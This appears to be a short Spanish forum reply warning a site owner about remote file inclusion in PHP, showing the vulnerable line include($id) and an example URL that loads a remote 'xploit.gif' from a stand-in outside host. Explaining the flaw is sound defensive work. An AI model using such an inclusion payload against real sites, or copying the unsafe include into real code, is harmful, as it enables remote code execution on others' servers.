Posiblemente un "remote include" si tu web tiene algo como esto:

include($id);

y tu url es algo asi

index.php?id=algo.php

entonces tienes problemas de seguridad

y te pueden incluir un archivo php cambiandole solo la extension (ejemplo GIF)

index.php?id=http://www.algunapagina.com/xploit.gif